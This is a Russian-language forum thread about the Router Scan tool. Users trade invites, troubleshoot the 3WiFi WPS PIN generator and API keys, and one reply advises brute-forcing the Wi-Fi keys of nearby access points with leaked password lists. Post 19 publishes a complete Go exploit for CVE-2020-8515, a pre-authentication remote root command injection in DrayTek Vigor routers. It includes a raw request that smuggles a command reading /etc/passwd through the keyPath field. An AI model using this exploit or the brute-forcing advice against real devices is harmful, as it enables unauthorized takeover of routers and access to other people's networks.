прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. demon-yo

    demon-yo New Member

    Joined:
    15 Mar 2020
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    киньте инвайт плиз
     
  2. CrosSZAK

    CrosSZAK New Member

    Joined:
    23 Mar 2020
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    и я хочу инвайт, тут только загорелся изучением уязвимости моего роутера, чёт как-то не успел в полной мере поюзать программку
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Пишите в личку, вышлю стоимость и реквизиты.
     
  4. erdbets

    erdbets New Member

    Joined:
    15 Aug 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    привет! забыл пароль к своей железке и прога ранее показывала пароль а сейчас нет. Роутер вроде тот же был. Сейчас подключен роутер по лану модель ниже
    QBR-1041WN router TTK
    Порты скана 80,8080,1080,443,161,53
    Может еще какой то порт не указал?
     
    #7304 erdbets, 26 Mar 2020
    Last edited: 27 Mar 2020
  5. zimmer

    zimmer Active Member

    Joined:
    19 Jun 2015
    Messages:
    151
    Likes Received:
    136
    Reputations:
    1
    Возможно было обновление прошивки, но причин может быть куча. И что мешает сбросить до заводских настроек и юзать уже тот пароль который придумаешь (пока опять не забудеш)

    80, 8080 и 443 вполне достаточно для поиска веб-админки (если не изменял ни чего в настройках), а так: чем больше портов - тем больше времени уйдет на скан
     
  6. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Почему у меня при генерации 3wifi WPS PIN пишет все время «устройства и/или подходящие алгоритмы не найдены»
    Пробывал на разных 30 точках доступа, но ничего так и не выдало.
    Помогите разобраться в этом))
     
  7. Piligrim740

    Piligrim740 Elder - Старейшина

    Joined:
    14 Aug 2016
    Messages:
    1,738
    Likes Received:
    14,220
    Reputations:
    29
    Это связано с тем, что гостевая учетка на 3WiFi закрыта, поэтому RS не может обратиться к генератору WPS пин.
    Нужно сказать спасибо, одному ( или нескольким ) уроду, который пытался спарсить базу 3WiFi.
    Поэтому гостевую отключили.

    PS. у кого есть аккаунт на 3WiFi, таких сложностей нет.
     
    binarymaster, kuz and Payer like this.
  8. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    У меня куплен аккаунт))Вчера покупал за 5$
     
  9. Piligrim740

    Piligrim740 Elder - Старейшина

    Joined:
    14 Aug 2016
    Messages:
    1,738
    Likes Received:
    14,220
    Reputations:
    29
    Для примера, скинул-бы один МАС адрес.
    04:A1:51:**:**:**
    А то ведь так не скажешь, не зная какого плана МАС адрес.
     
  10. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    04:95:E6:F1:84:F1-вот)
     
  11. Piligrim740

    Piligrim740 Elder - Старейшина

    Joined:
    14 Aug 2016
    Messages:
    1,738
    Likes Received:
    14,220
    Reputations:
    29
    Это Tenda, к ним нет генератора WPS пин.
    Можешь тут проверять, какой роутер мучаешь.
    https://2ip.ua/ru/services/information-service/mac-find

    PS. тоже с Тендой мучаюсь, не растёт с пином, после 10 попыток улетает в лок.
     
  12. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А к каким подходит генератор WPS пин?
    У меня получается ни к одной не подходит? :)
     
  13. zimmer

    zimmer Active Member

    Joined:
    19 Jun 2015
    Messages:
    151
    Likes Received:
    136
    Reputations:
    1
    попробуй сбрутить ключь (не пин) роутер сканом со встроеным пасслистом, не поможет, втыкай пасс лист побольше (в соседней теме стас переодически выкладывает выборку паролей с 3wifi) - довольно часто прокатывает (но не всегда)
     
  14. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ещё вот есть проблемка с роутер сканом,когда я вхожу в свою учетную запись в программе,то у меня выдаёт наподобие этого «не установлена связь с 3wifi,сгенерируйте на самом сайте» хотя интернет был в порядке
     
  15. mrHook

    mrHook Member

    Joined:
    19 Mar 2020
    Messages:
    10
    Likes Received:
    6
    Reputations:
    0
    В своем кабинете API ключ установил ?
     
    4Fun likes this.
  16. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ничего вроде не устанавливал,подскажите пожалуйста,где это находится?
    В программе или на сайте? :)
     
  17. mrHook

    mrHook Member

    Joined:
    19 Mar 2020
    Messages:
    10
    Likes Received:
    6
    Reputations:
    0
    1) на сайте кликнуть по своему нику
    2) перейдешь Управлением пользователем (твой Ник)
    3) найди API ключ ( чтение и запись) , если пусто нажми получить новый
    Все ( проверяешь на программе RS - не должно быть ошибок)
     
    4Fun likes this.
  18. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо,все помогло :)
     
  19. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    367
    Likes Received:
    163
    Reputations:
    19
    RCE, DrayTek Vigor, CVE-2020-8515


    Code:
    package main
    
    
    /*
    CVE-2020-8515: DrayTek pre-auth remote root RCE
    Mon Mar 30 2020 -  0xsha.io
    Affected:
    DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
    and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
    and 1.4.4_Beta
    You should upgrade as soon as possible to 1.5.1 firmware or later
    This issue has been fixed in Vigor3900/2960/300B v1.5.1.
    read more :
    https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
    https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
    https://thehackernews.com/2020/03/draytek-network-hacking.html
    https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
    exploiting using keyPath
    POST /cgi-bin/mainfunction.cgi HTTP/1.1
    Host: 1.2.3.4
    Content-Length: 89
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
     */
    
    import (
        "fmt"
        "io/ioutil"
        "net/http"
        "net/url"
        "os"
        "strings"
    )
    
    func usage()  {
    
        fmt.Println("CVE-2020-8515 exploit by  @0xsha ")
        fmt.Println("Usage :  " + os.Args[0] + " URL " + "command"  )
        fmt.Println("E.G :  " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\""  )
    }
    
    func main() {
    
    
        if len(os.Args) < 3 {
            usage()
            os.Exit(-1)
        }
    
        targetUrl := os.Args[1]
        //cmd := "cat /etc/passwd"
        cmd := os.Args[2]
    
    
        // payload preparation
        vulnerableFile := "/cgi-bin/mainfunction.cgi"
        // specially crafted CMD
        // action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
        payload :=`'
        /bin/sh -c 'CMD'
        '`
        payload = strings.ReplaceAll(payload,"CMD", cmd)
        bypass := strings.ReplaceAll(payload," ", "${IFS}")
    
        //PostForm call url encoder internally
        resp, err := http.PostForm(targetUrl+vulnerableFile ,
            url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"}   })
    
        if err != nil{
            fmt.Println("error connecting host")
            os.Exit(-1)
        }
    
    
        defer resp.Body.Close()
        body, err := ioutil.ReadAll(resp.Body)
        
        if err != nil{
            fmt.Println("error reading data")
            os.Exit(-1)
        }
        
        fmt.Println(string(body))
    
    }
     
  20. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Это что?)